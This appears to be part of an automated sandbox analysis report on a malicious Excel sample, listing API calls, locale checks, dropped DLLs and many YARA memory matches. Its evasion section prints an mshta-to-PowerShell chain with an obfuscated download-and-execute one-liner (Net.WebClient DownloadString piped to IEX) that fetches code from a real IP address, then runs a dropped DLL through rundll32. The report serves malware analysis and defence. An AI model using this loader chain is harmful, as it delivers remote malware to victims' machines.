Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003ACCC __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 9_2_1003ACCC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 11_2_10037657
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1002F81E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 11_2_1002F81E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1003B89A SetUnhandledExceptionFilter,__encode_pointer, 11_2_1003B89A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1003B8BC __decode_pointer,SetUnhandledExceptionFilter, 11_2_1003B8BC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1003ACCC __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 11_2_1003ACCC

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({HgfRrtGdf}{HgfRrtGdf}Ne{HgfRrtGdf}{HgfRrtGdf}w{HgfRrtGdf}-Obj{HgfRrtGdf}ec{HgfRrtGdf}{HgfRrtGdf}t N{HgfRrtGdf}{HgfRrtGdf}et{HgfRrtGdf}.W{HgfRrtGdf}{HgfRrtGdf}e'.replace('{HgfRrtGdf}', ''); $c4='bC{HgfRrtGdf}li{HgfRrtGdf}{HgfRrtGdf}en{HgfRrtGdf}{HgfRrtGdf}t).D{HgfRrtGdf}{HgfRrtGdf}ow{HgfRrtGdf}{HgfRrtGdf}nl{HgfRrtGdf}{HgfRrtGdf}{HgfRrtGdf}o'.replace('{HgfRrtGdf}', ''); $c3='ad{HgfRrtGdf}{HgfRrtGdf}St{HgfRrtGdf}rin{HgfRrtGdf}{HgfRrtGdf}g{HgfRrtGdf}(''ht{HgfRrtGdf}tp{HgfRrtGdf}://91.240.118.168/qqw/aas/se.png'')'.replace('{HgfRrtGdf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({HgfRrtGdf}{HgfRrtGdf}Ne{HgfRrtGdf}{HgfRrtGdf}w{HgfRrtGdf}-Obj{HgfRrtGdf}ec{HgfRrtGdf}{HgfRrtGdf}t N{HgfRrtGdf}{HgfRrtGdf}et{HgfRrtGdf}.W{HgfRrtGdf}{HgfRrtGdf}e'.replace('{HgfRrtGdf}', ''); $c4='bC{HgfRrtGdf}li{HgfRrtGdf}{HgfRrtGdf}en{HgfRrtGdf}{HgfRrtGdf}t).D{HgfRrtGdf}{HgfRrtGdf}ow{HgfRrtGdf}{HgfRrtGdf}nl{HgfRrtGdf}{HgfRrtGdf}{HgfRrtGdf}o'.replace('{HgfRrtGdf}', ''); $c3='ad{HgfRrtGdf}{HgfRrtGdf}St{HgfRrtGdf}rin{HgfRrtGdf}{HgfRrtGdf}g{HgfRrtGdf}(''ht{HgfRrtGdf}tp{HgfRrtGdf}://91.240.118.168/qqw/aas/se.png'')'.replace('{HgfRrtGdf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mshta.exe mshta http://91.240.118.168/qqw/aas/se.html
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({HgfRrtGdf}{HgfRrtGdf}Ne{HgfRrtGdf}{HgfRrtGdf}w{HgfRrtGdf}-Obj{HgfRrtGdf}ec{HgfRrtGdf}{HgfRrtGdf}t N{HgfRrtGdf}{HgfRrtGdf}et{HgfRrtGdf}.W{HgfRrtGdf}{HgfRrtGdf}e'.replace('{HgfRrtGdf}', ''); $c4='bC{HgfRrtGdf}li{HgfRrtGdf}{HgfRrtGdf}en{HgfRrtGdf}{HgfRrtGdf}t).D{HgfRrtGdf}{HgfRrtGdf}ow{HgfRrtGdf}{HgfRrtGdf}nl{HgfRrtGdf}{HgfRrtGdf}{HgfRrtGdf}o'.replace('{HgfRrtGdf}', ''); $c3='ad{HgfRrtGdf}{HgfRrtGdf}St{HgfRrtGdf}rin{HgfRrtGdf}{HgfRrtGdf}g{HgfRrtGdf}(''ht{HgfRrtGdf}tp{HgfRrtGdf}://91.240.118.168/qqw/aas/se.png'')'.replace('{HgfRrtGdf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll AADD
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll AADD
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\QWER.dll",DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Klovgjl\kcktqpyucuj.sda",ZbJdKnmHcqZ
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Klovgjl\kcktqpyucuj.sda",DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Xdubhjjihlzjbmcz\dcep.opz",NNzCvXXtcqztdiA
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Xdubhjjihlzjbmcz\dcep.opz",DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jdywrgg\axwj.zob",NblZwpRsgtK
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jdywrgg\axwj.zob",DllRegisterServer
Source: Yara match File source: 80_513972285.xls, type: SAMPLE
Source: Yara match File source: C:\Users\user\Desktop\80_513972285.xls, type: DROPPED

Language, Device and Operating System Detection

Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoA, 9_2_1003F570
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetThreadLocale,GetLocaleInfoA,GetACP, 9_2_10043730
Source: C:\Windows\SysWOW64\rundll32.exe Code function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA, 9_2_10014B71
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoA, 11_2_1003F570
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetThreadLocale,GetLocaleInfoA,GetACP, 11_2_10043730
Source: C:\Windows\SysWOW64\rundll32.exe Code function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA, 11_2_10014B71
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003DAA7 cpuid 9_2_1003DAA7
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003906D GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 9_2_1003906D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003CE1A __lock,__invoke_watson,__invoke_watson,__invoke_watson,____lc_codepage_func,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson, 9_2_1003CE1A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_100453C8 GetVersion,GetVersion,GetVersion,GetVersion,GetVersion,RegisterClipboardFormatA, 9_2_100453C8

Stealing of Sensitive Information

Source: Yara match File source: 17.2.rundll32.exe.330000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.28f0000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2890000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2810000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2280000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.3060000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2340000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2130000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2860000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.190000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.3e0000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2280000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2170000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.420000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.460000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2100000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2830000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.330000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.27a0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2e10000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.27a0000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.3150000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.610000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.23f0000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2e00000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2080000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.190000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2130000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.28a0000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.440000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.26d0000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.6c0000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.31c0000.15.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.330000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.26b0000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.190000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.380000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.630000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2840000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.3190000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2870000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.430000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.28c0000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.180000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.1c0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2160000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.4f0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2740000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.460000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.27a0000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2730000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.340000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.4f0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2860000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2340000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.26d0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2950000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.470000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2890000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2810000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.3030000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.300000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.23c0000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.4f0000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.200000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.380000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.200000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2dc0000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.4f0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.28f0000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2950000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2740000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.23f0000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.3030000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.260000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.4c0000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.3160000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2e10000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.660000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2870000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2080000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.190000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2490000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.630000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2730000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.300000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.180000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2ed0000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.27c0000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2e00000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.3190000.14.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2890000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.1c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2700000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2170000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2890000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.10000000.16.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000011.00000002.672129305.0000000000460000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.565576249.0000000002841000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.614471421.0000000003061000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.510608388.0000000002ED1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.565412374.00000000026D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.564937807.0000000000200000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.672206410.00000000004C1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.672542934.00000000023C1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.675105738.00000000031C1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.509691983.0000000000380000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.672233162.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.671351696.0000000000180000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.614263255.0000000002891000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.671971939.00000000003E1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.514065714.00000000001A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.613086830.0000000000190000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.672276729.0000000000611000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.614545776.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.510373196.0000000002890000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.510260153.0000000002740000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.613891474.0000000002170000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.613342038.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.565506727.00000000027A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.567895594.0000000000300000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.675067684.0000000003190000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.614325624.0000000002950000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.614438771.0000000003030000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.510667014.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.565439888.0000000002701000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.510425143.00000000028C1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.565551248.0000000002810000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.565698294.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.510010458.0000000002130000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.509922920.0000000002080000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.514698978.0000000000471000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.510517753.0000000002E00000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.510176839.00000000026B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.568150198.0000000000331000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.672589404.00000000023F0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.613442141.00000000006C1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.675028637.0000000003161000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.613971338.0000000002491000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.565128790.0000000000661000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.565466027.0000000002730000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.614142809.00000000027A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.674472849.0000000002891000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.672492274.0000000002340000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.614372731.0000000002DC1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.509833538.0000000000421000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.565096650.0000000000630000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.613198246.0000000000431000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.675215559.0000000010001000.00000020.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.450462581.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.510060149.0000000002161000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.617473555.0000000000441000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.617627799.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.510140052.0000000002280000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.671797398.0000000000330000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.510293000.00000000027C1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.564986915.0000000000261000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.565627998.00000000028A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.509954832.0000000002101000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.616810767.0000000000190000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.674563401.00000000028F0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.614197032.0000000002831000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.568578862.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.565801844.0000000003151000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.671423407.00000000001C1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.565866582.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.614228489.0000000002860000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.514808197.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.565599896.0000000002870000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\ProgramData\QWER.dll, type: DROPPED